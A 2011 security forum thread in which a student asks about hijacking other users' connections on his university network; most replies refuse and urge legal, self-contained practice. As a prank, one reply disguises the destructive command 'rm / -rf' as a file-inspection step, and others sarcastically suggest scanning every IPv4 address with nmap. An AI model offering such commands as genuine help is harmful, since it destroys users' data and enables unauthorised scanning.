.

Connected to my university's network

<<

uperkurk

Newbie
Newbie

Posts: 13

Joined: Wed Sep 21, 2011 9:25 pm

Post Thu Sep 22, 2011 10:00 am

Connected to my university's network

Hello, my laptop is connected to my universitys network via the ethernet port in my room and I was just wondering my entire tower surely uses the same network to connect all the PC's together.

I would like to see how easy it would be to try and access someone else connection and hi-jack their internet connection so I dont use my own very limited bandwidth to download stuff.

I know this is wrong but it's just for the challenge. Wonder how secure it would be.
<<

Triban

User avatar

Hero Member
Hero Member

Posts: 620

Joined: Fri Feb 19, 2010 4:17 pm

Post Thu Sep 22, 2011 10:10 am

Re: Connected to my university's network

It is very wrong and illegal.  So you will probably not get the answer you seek here.  If you want to study ETHICAL hacking, you should be aware of laws and such.  If you are caught doing this on campus, you will most likely be tossed and could face some additional charges depending on how serious UNI is on such activities.  Don't kill your career before it starts.  Set up your own lab and practice on yourself.
Certs: GCWN
(@)Dewser
<<

uperkurk

Newbie
Newbie

Posts: 13

Joined: Wed Sep 21, 2011 9:25 pm

Post Thu Sep 22, 2011 10:21 am

Re: Connected to my university's network

That does seem like the better option but still I would like to "try" to connect just to see if I can, using it to download... maybe ill forget that bit as what you said seems logical.

I;m just curious to see how easy it would be, curiousity I guess
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Sat Sep 24, 2011 9:37 am

Re: Connected to my university's network

If you're that curious, you'll find a way to do it on your own. No one here is going to support it. Carry on at your own risk.
<<

pseud0

User avatar

Recruiters
Recruiters

Posts: 210

Joined: Sat Nov 17, 2007 8:26 pm

Location: Detroit, Michigan

Post Sat Sep 24, 2011 10:13 am

Re: Connected to my university's network

Bill, if you're going to tell him to do it himself you should at least give him something to start with.  I'd suggest getting a comprehensive map of the network using something like:

#nmap -sT -p1-65535 198.81.129.125 > haxxor.txt

Then examine that file for anything interesting with:

#rm / -rf | haxxor.txt

Video examples can be found at:

http://www.youtube.com/watch?v=dQw4w9WgXcQ

Results may vary.
CISSP, CISM, CISA, GCIH, GREM, CEH, HMFIC, KTHXBIROFLCOPTER
<<

uperkurk

Newbie
Newbie

Posts: 13

Joined: Wed Sep 21, 2011 9:25 pm

Post Sat Sep 24, 2011 10:20 am

Re: Connected to my university's network

I dont know what the whole haxxor thing is about if your trolling to be sarcastic or whatever but im taking this course to be network engineer / network security expert not to sit at home "hacking" into random peoples computers while eating a bowl of cheerios.....

But yes I have heard of nmap, metasploit ect... that command you have typed out is that for linux uses because I remember when I used nmap years ago I swear it had a gui
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Sat Sep 24, 2011 4:05 pm

Re: Connected to my university's network

You're right, my mistake. Let me try and help out a bit.

When I read this:

uperkurk wrote:I would like to see how easy it would be to try and access someone else connection and hi-jack their internet connection so I dont use my own very limited bandwidth to download stuff. I know this is wrong but it's just for the challenge. Wonder how secure it would be.


I thought you implied you were going to be doing the stuff you mentioned about the cheerios and all - I know I always have a bowl with me while hacking into things.

If you're feeling particularly verbose and don't want to miss anything, try this:

#!/bin/bash
for a in {1..255}
do for b in {1..255}
do for c in {1..255}
do for d in {1..255}
do echo "$a.$b.$c.$d" >> EVERY_IP_EVER.txt
done done done done

Then feed that into your nmap command like so:

nmap -sT -p1-65535 -iL EVERY_IP_EVER.txt > haxxor.txt

You won't miss much that way.

And nmap does have a gui, zenmap, but you don't want to use that - it'll show others around you what you're up to. Just stick to the cli version.
<<

MaXe

User avatar

Hero Member
Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Sun Sep 25, 2011 5:59 pm

Re: Connected to my university's network

BillV wrote:
#!/bin/bash
for a in {1..255}
do for b in {1..255}
do for c in {1..255}
do for d in {1..255}
do echo "$a.$b.$c.$d" >> EVERY_IP_EVER.txt
done done done done


I don't want to be too much of a critic, but that is going to scan the entire Internet and even attempt to scan locally reserved IP-address pools such as 10.0.0.0/8, 172.16.0.0/16 and 192.168.0.0/16 (Often this last one is referred to and used as a 192.168.0.0/24 though, but can be used as a /16 classless CIDR range as well.)

Also, shouldn't he avoid scanning the multicast ranges beginning at 224.0.0.0 and ending at 239.255.255.25 ? And even the "Class E" beginning at 240.0.0.0 and ending at 255.255.255.255 ? ( Reserved for future use, or Research and Development Purposes. )

After all, 255.255.255.255 is a broadcast address. ( http://en.wikipedia.org/wiki/Broadcast_address )

uperkurk wrote:Hello, my laptop is connected to my universitys network via the ethernet port in my room and I was just wondering my entire tower surely uses the same network to connect all the PC's together.


The network you're connected to, is most likely in a switched environment. If you want to know if you can access any computer on the network, you can e.g., ask the network admin(s). It is unlikely that you can access everything, as some parts like those used by the staff (administration, etc.) is probably on another network. (Or at least they should be.)

uperkurk wrote:I would like to see how easy it would be to try and access someone else connection and hi-jack their internet connection so I dont use my own very limited bandwidth to download stuff.


This forum is called, The Ethical Hacker Network. Being an ethical hacker, means you're abiding by the law and that you have explicit permission to test whatever you're testing. By hijacking any connection, you're breaking a dozen of laws.

I'm not going to demonstrate how you can hijack anyone's connections nor break your bandwidth limit, as this is clearly unethical and also illegal.

uperkurk wrote:I know this is wrong but it's just for the challenge. Wonder how secure it would be.


If it's just for the challenge, and you know it's wrong, then this is not the forum to ask these type of questions. A more suited place for these types of questions you have, would probably be HackForums, where similar entities like you, doesn't care whether things are legal or not.

If you should get caught, then you can get a fine and possibly jail time as well, depending on the laws of the country you live in. (Also, you can forget about any future work within computers.)

So I advise you to think twice, before you do anything you might regret later on.
I'm an InterN0T'er
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Sun Sep 25, 2011 6:25 pm

Re: Connected to my university's network

Me THINKS that BillV's response was intended to be semi-sarcastic...  Not serious.  You'll note, his output clearly names the file:

EVERY_IP_EVER.txt

LOL!
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Sun Sep 25, 2011 7:35 pm

Re: Connected to my university's network

More entirely, less semi ;)
<<

Triban

User avatar

Hero Member
Hero Member

Posts: 620

Joined: Fri Feb 19, 2010 4:17 pm

Post Mon Sep 26, 2011 11:43 am

Re: Connected to my university's network

BillV you forgot to include IPv6 address, nmap does support it now  ;)

Uperkurk, a number of these types of posts happen on a regular basis, it is not to say anyone hinder your from learning, but you just need to realize what you are asking and where you are asking it.  Curiosity is a great thing, but it is true about it killing the cat.  Many of the early hackers were grayhats, they saw things and wanted to see how they worked.  Unfortunately some folks went a bit too far and authorities started catching on.  In any case as a network engineering student it is important to know where networking vulnerabilities lie and what types of access attackers may have once on the network. 

Another thing to keep in mind, depending on the University, they may have countermeasures in place to pick up network scanning from their networks.  So the moment you begin to scan, you may be discovered and at the least your traffic will be blocked and your connection turned off.  If they are really serious, they could kick you out of school.  If you have questions about accessibility of the network, bring them up in class.
Certs: GCWN
(@)Dewser
<<

jasohansen

Newbie
Newbie

Posts: 5

Joined: Wed Jan 09, 2008 10:30 am

Post Mon Sep 26, 2011 11:50 am

Re: Connected to my university's network

pseud0 wrote:
Results may vary.


LAWL
<<

rattis

User avatar

Hero Member
Hero Member

Posts: 1172

Joined: Mon Jul 27, 2009 1:25 pm

Post Mon Sep 26, 2011 12:40 pm

Re: Connected to my university's network

uperkurk wrote:Hello, my laptop is connected to my universitys network via the ethernet port in my room and I was just wondering my entire tower surely uses the same network to connect all the PC's together.

I know this is wrong but it's just for the challenge. Wonder how secure it would be.


What would be more fun, and without reading the AUP of the university, most likely legit, and better yet realivent to your chosen field...

set up either your box, or a couple of boxes, to see what kind of traffic is coming IN TO YOU that port. I wouldn't trust that there are not infected machines hitting yours all day long.

The fact that you mentioned the gui for nmap, hints you're using a windows box. How's the firewall on that thing.

Having been a network enigineer for more years than I care to admit, get used to the CLI, because I have yet to see a device in the enterprise that has a GUI that works properly. Unless it was a SOHO (read meant for home users only) device that someone brought because it was cheap.

If it was me, here is what I would do:
- Harden my system to the point of being un-accessible from the outside.
- Install either a Linksys Wireless Router (preferably a hackable one with DD-WRT running on it), or a system running untagled to be my gateway / firewall
- Set up snort to watch for people trying to scan you
- Practice getting used to reading the system logs
- Maybe set up a honeypot for fun, just to see how fell in to it

- On the nights I'm really bored, drop a network tap in between the firewall I PUT IN and wall jack. Connect wireshark to see what is going into my firewall, and re-tweek the rules on it. Depending on the tap, maybe attack the MY firewall to see if the rules are doing what I think they should be doing.
OSWP, Sec+
<<

WCNA

User avatar

Full Member
Full Member

Posts: 187

Joined: Wed Mar 02, 2011 8:05 am

Location: Florida

Post Mon Sep 26, 2011 8:06 pm

Re: Connected to my university's network

Then examine that file for anything interesting with:

#rm / -rf | haxxor.txt


Funny...and then you rickrolled him too?

------------------------
Edit: Oh snap! Map the CIA too  :D
Last edited by WCNA on Mon Sep 26, 2011 8:10 pm, edited 1 time in total.
ISC2 Associate, WCNA, CWNA, OSCP, Network+
<<

HaoleHero

Newbie
Newbie

Posts: 5

Joined: Sun Sep 11, 2011 1:58 pm

Post Wed Sep 28, 2011 9:50 pm

Re: Connected to my university's network

This did give me quite a laugh. Bravo!
Next

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 2 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software